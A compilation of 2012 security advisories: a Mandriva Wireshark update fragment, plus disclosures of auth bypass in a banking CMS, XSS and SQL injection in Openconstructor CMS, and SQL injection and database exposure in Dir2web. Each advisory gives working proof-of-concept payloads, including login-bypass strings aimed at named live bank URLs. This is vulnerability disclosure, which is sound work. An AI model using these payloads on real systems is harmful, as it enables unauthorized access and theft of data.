mes5/x86_64/lib64wireshark-devel-1.4.14-0.1mdvmes5.2.x86_64.rpm dcd1f95845241b0185881b4dc3c03926 mes5/x86_64/rawshark-1.4.14-0.1mdvmes5.2.x86_64.rpm 1f6e17dca6e5341abbcb023ccfcd2279 mes5/x86_64/tshark-1.4.14-0.1mdvmes5.2.x86_64.rpm fbdadf4ffd48a6b0a9055180a9b29f08 mes5/x86_64/wireshark-1.4.14-0.1mdvmes5.2.x86_64.rpm 00854c699d93b24b7a6e1d884e8c534a mes5/x86_64/wireshark-tools-1.4.14-0.1mdvmes5.2.x86_64.rpm 392f5a6307f5b89f4c76778e55b70ba6 mes5/SRPMS/wireshark-1.4.14-0.1mdvmes5.2.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability
Title: == BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability Date: = 2012-07-09 References: === http://www.vulnerability-lab.com/get_content.php?id=654 VL-ID: = 654 Common Vulnerability Scoring System: 8.5 Abstract: = A Vulnerability-Lab researcher discovered an SQL injection vulnerability in the Beneficial Bank Business Banking v4.13.1 CMS. Report-Timeline: 2012-07-09: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A Auth Bypass vulnerability is detected in the Beneficial Bank Business Banking 4.13.1 Content Management System. Remote attackers without privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the login module with the bound vulnerable Company ID Company Password parameters. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise unauthorized web application (admin/customer) panel access. Vulnerable Section(s): [+] Login Vulnerable Parameter(s): [+] User Pass Proof of Concept: = The login auth bypass vulnerability can be exploited by remote attacker without privileged user account. For demonstration or reproduce ... PoC: user : ' or 1=1-- pass : ' or 1=1-- URL: http://www.thebeneficial-ebanking.com/customer_demo/index2.html https://www.frontrangebankonline.com/customer_demo/index2.html http://www.libertybaybank.com/customer_demo/index2.html http://www.fs-bankonline.com/customer_demo/index2.html http://www.centralstateonline.com/customer_demo/index2.html http://www.hvbonlinebanking.com/customer_demo/index2.html Risk: = The security risk of the auth bypass vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Chokri Ben Achor (meis...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
[CVE-2012-3870] Openconstructor CMS 3.12.0 'createobject.php', 'name' and 'description' parameters Stored Cross-site Scrpting vulnerabilities
###Title###: Openconstructor CMS 3.12.0 'createobject.php', 'name' and 'description' parameters Stored Cross-site Scrpting vulnerabilities ###Affected Software###: http://www.openconstructor.org/ http://code.google.com/p/openconstructor/downloads/list http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234 ###Description###: Openconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP. Stored XSS vulnerabilities exist on the 'name' and 'description' parameters, which are used as properties when creating a new object. Verson 3.12.0 is vulnerable, previous version may be affected, but they have not been tested. ###CVE### CVE-2012-3870 ###Impact###: Authenticated attackers can plant malicious javascript in the web application, with the aim to execute it on the other user's browser. CVSS Base Score: 4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N) ###Credits###: Lorenzo Cantoni (lorenzo[dot]cantoni86[at]gmail[dot]com) ###Details###: When creating a new object in the object section, the application asks to set a name and a description for that object. The application does not escape the html tags correctly for these parameters. The vulnerability has been tested on an Internet Explorer 7 browser (because the application is designed to work with IE). Newer version of the browser with the anti-xss filter enabled, may help to protect users from such attacks. 'createobject.php' contains multiple lines of code (for the various kind of objects) with code similar to the following one: $obj-name = $_POST['name']; $obj-description = $_POST['description']; $result = ObjManager::create($obj); $obj with name and description attributes is passed to ObjManager::create() function without HTML escaping. When the user access the Object section and list the objects with a malicious name or description, will trigger the exploit. Additionally, if the object can be published, the exploit can be triggered also in the Sitemap section. ###Proof of Concept###: Here is a trace of the required POST to plant the javascript POST /openconstructor/objects/createobject.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://10.0.2.15/openconstructor/objects/createobject.php?ds_type=htmltextobj_type=htmltextbody Accept-Language: it Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Proxy-Connection: Keep-Alive Host: 10.0.2.15 Pragma: no-cache Cookie: curnode=htmltextbody; PHPSESSID=s8fnmtbfv0h1ofdeotu4h75p33; wcsUserLogin=root; wcsUserName=Administrator Content-Length: 141 ds_type=htmltextobj_type=htmltextbodyname=xssed+%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3Edescription=asdds_id=3createobject=Create ###Disclosure### [08/07/2012] Lead Developer contacted. [22/07/2012] No response. Sent another mail. [04/08/2012] Still no response. Public disclosure.
[CVE-2012-3872] Openconstructor CMS 3.12.0 Multiple Reflected Cross-site Scrpting vulnerabilities
###Title###:
Openconstructor CMS 3.12.0 Multiple Reflected Cross-site Scrpting
vulnerabilities
###Affected Software###:
http://www.openconstructor.org/
http://code.google.com/p/openconstructor/downloads/list
http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234
###Description###:
Openconstructor (formerly known as eSector Solutions Web Constructor) is an
open source web Content Management System written in PHP. Multiple Reflected
XSS vulnerabilities exist on different parameters of differnt pages.
Verson 3.12.0 is vulnerable, previous version may be affected, but they have
not been tested.
###CVE###
CVE-2012-3872
###Impact###:
Attackers can execute malicious javascript in authenticated users's browser,
through social engineering techniques.
CVSS Base Score: 4.0 (AV:N/AC:H/Au:N/C:P/I:P/A:N)
###Credits###:
Lorenzo Cantoni
###Details###:
Vulnerabilities has been tested on Internet Explorer 7, as the application is
designed to work with that browser. Newer version of the browser with the
anti-xss filter enabled, may help to protect users from such attacks.
###Proof of Concept###:
1)
http://hostname/openconstructor/data/file/edit.php?result=scriptalert('xss')/scriptid=newds_id=8hybridid=fieldid=callback=type=txtname=testdescription=testfname=testcreate=Save
Note: The right 'ds_id' must be set for an existing object.
2)
http://hostname/openconstructor/confirm.php?q=scriptalert('XSS')/scriptskin=metallic
3)
http://hostname/openconstructor/users/users.php?type=multiplekeyword=scriptalert('xss')/script
###Disclosure###
[08/07/2012] Lead Developer contacted.
[22/07/2012] No response. Sent another mail.
[04/08/2012] Still no response. Public disclosure.
[CVE-2012-3871] Openconstructor CMS 3.12.0 'data/hybrid/i_hybrid.php', 'header' parameter Stored Cross-site Scripting Vulnerability
###Title###:
Openconstructor CMS 3.12.0 'data/hybrid/i_hybrid.php', 'header' parameter
Stored Cross-site Scripting Vulnerability
###Affected Software###:
http://www.openconstructor.org/
http://code.google.com/p/openconstructor/downloads/list
http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234
###Description###:
Openconstructor (formerly known as eSector Solutions Web Constructor) is an
open source web Content Management System written in PHP. A stored XSS
vulnerability exist on the 'header' parameter passed to 'i_hybrid.php' page,
which is used when creating a new document in the catalogue section.
Verson 3.12.0 is vulnerable, previous version may be affected, but they have
not been tested.
###CVE###
CVE-2012-3871
###Impact###:
Authenticated attackers can plant malicious javascript in the web application,
with the aim to execute it on the other user's browser.
CVSS Base Score: 4.9 (AV:N/AC:M/Au:S/C:P/I:P/A:N)
###Credits###:
Lorenzo Cantoni
###Details###:
When creating a new document in the catalogue section, the application asks to
set a name for that object.
The application does not escape the html tags correctly for these parameters.
The vulnerability has been tested on an Internet Explorer 7 browser (because
the application is designed to work with IE). Newer version of the browser with
the anti-xss filter enabled, may help to protect users from such attacks.
'data/hybrid/i_hybrid.php' contains the following code:
$doc-readValues($_POST);
$doc-readFiles($_FILES);
$ds-createDocument($doc);
readValues() does not escape dangerous html carachters, so they are passed to
createDocument() which store all the attributes in the database.
When the user reach the main 'Catalogue' section, the XSS is triggered.
###Proof of Concept:
Here is a trace of the required POST to plant the javascript
POST /openconstructor/data/hybrid/i_hybrid.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/x-ms-application,
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer:
http://10.0.2.15/openconstructor/data/hybrid/edit.php?0=-1id=newds_id=11
Accept-Language: it
Content-Type: multipart/form-data;
boundary=---7dc262a2803fa
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: 10.0.2.15
Pragma: no-cache
Cookie: curnode=12; vf[img_intro]=disabled; def_bs0=rating; dsh=11;
PHPSESSID=s8fnmtbfv0h1ofdeotu4h75p33; wcsUserLogin=root;
wcsUserName=Administrator
Content-Length: 857
-7dc262a2803fa
Content-Disposition: form-data; name=action
create_hybrid
-7dc262a2803fa
Content-Disposition: form-data; name=ds_id
11
-7dc262a2803fa
Content-Disposition: form-data; name=id
new
-7dc262a2803fa
Content-Disposition: form-data; name=hybridid
-7dc262a2803fa
Content-Disposition: form-data; name=fieldid
-7dc262a2803fa
Content-Disposition: form-data; name=callback
-7dc262a2803fa
Content-Disposition: form-data; name=header
scriptalert('xss')/script
-7dc262a2803fa
Content-Disposition: form-data; name=published
0
-7dc262a2803fa--
###Disclosure###
[08/07/2012] Lead Developer contacted.
[22/07/2012] No response. Sent another mail.
[04/08/2012] Still no response. Public disclosure.
[CVE-2012-3873] Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities
###Title###: Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities ###Affected Software###: http://www.openconstructor.org/ http://code.google.com/p/openconstructor/downloads/list http://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234 ###Description###: Openconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP. Multiple SQL injection vulnerabilities exist on the 'id' parameter, which is used across different sections of the application. Verson 3.12.0 is vulnerable, previous version may be affected, but they have not been tested. ###CVE### CVE-2012-3873 ###Impact###: Authenticated attackers can execute arbitrary SQL queries. CVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C) ###Credits###: Lorenzo Cantoni ###Details###: The following lines of code are the cause of the issue: ds-get_record($_GET['id']) get_record() perform a query on the database, without checking the user supplied data in the 'id' parameter. The following pages are vulnerable: data/gallery/edit.php data/guestbook/edit.php data/file/edit.php data/htmltext/edit.php data/publication/edit.php data/event/edit.php 'getimage/showimage.php' is also vulnerable, due to the following lines of code: $res = $db-query( 'SELECT id, name, filename, size, type, date'. ' FROM dsfile'. ' WHERE id='.$_GET['id'] ); ###Proof of Concept###: An object (eg:gallery object, file object, guestbook object ...) must first be created or has to already exist in order to exploit the vulnerability. For instance, if a guestbook object has been created, an attacker can open it in edit page and exploit a blind SQL injection as follows: http://hostname/openconstructor/data/guestbook/edit.php?ds_id=1id=4 AND 1=1 #returns a TRUE value for the query http://hostname/openconstructor/data/guestbook/edit.php?ds_id=1id=4 AND 1=1 #returns a FALSE value for the query In my test environment, I have been able to confirm the possibility to execute queries with the following commands: http://hostname/openconstructor/data/guestbook/edit.php?ds_id=10id=4 AND (select @@version)='5.5.16-log' #returns a TRUE value for the query http://hostname/openconstructor/data/guestbook/edit.php?ds_id=10id=4 AND (select @@version)='5.5.16-foo' #returns a FALSE value for the query On 'getimage/showimage.php', an image file must be first successfully uploaded. The exploitation is very similar: http://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-foo' # returns a FALSE value for the query http://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-log' # return a TRUE value for the query ###Disclosure### [08/07/2012] Lead Developer contacted. [22/07/2012] No response. Sent another mail. [04/08/2012] Still no response. Public disclosure.
Dir2web3 Mutiple Vulnerabilities
Title:
==
Dir2web3 Multiple Vulnerabilities
Date:
=
05/08/2012
Author:
===
Daniel Correa (http://www.sinfocol.org/)
Vulnerable software:
Dir2web v3.0 (http://www.dir2web.it/)
CVE:
CVE-2012-4069
CVE-2012-4070
Details:
There are two vulnerabilities identified on Dir2web v3.0:
Information disclosure (CVE-2012-4069):
Database folder is public and it is not protected via .htaccess. An attacker
can download the entire database and look for hidden pages on the website.
SQL Injection (CVE-2012-4070):
Preg_match function is not enough to protect GET/POST parameters. An
attacker
can easily make a SQL Injection over the application.
Exploit:
Information disclosure:
http://site/_dir2web/system/db/website.db
SQL Injection:
http://site/index.php?wpid=homepageoid=6a303a0aaa' OR id 0-- -
Patch:
==
Information disclosure:
Create .htaccess file on _dir2web folder with the following content:
order deny, follow
deny from all
SQL Injection:
Fix the regular expression in dispatcher.php file located on
_dir2web/system/src folder.
Replace:
'/[a-zA-Z0-9]{10}/'
With:
'/^[a-zA-Z0-9]{10}$/'
Timeline:
=
13/07/2012: Vendor contacted
25/07/2012: CERT contacted
27/07/2012: CVE assigned
05/08/2012: Vulnerability published on Bugtraq
--
Regards,
Daniel Correa
signature.asc
Description: OpenPGP digital signature
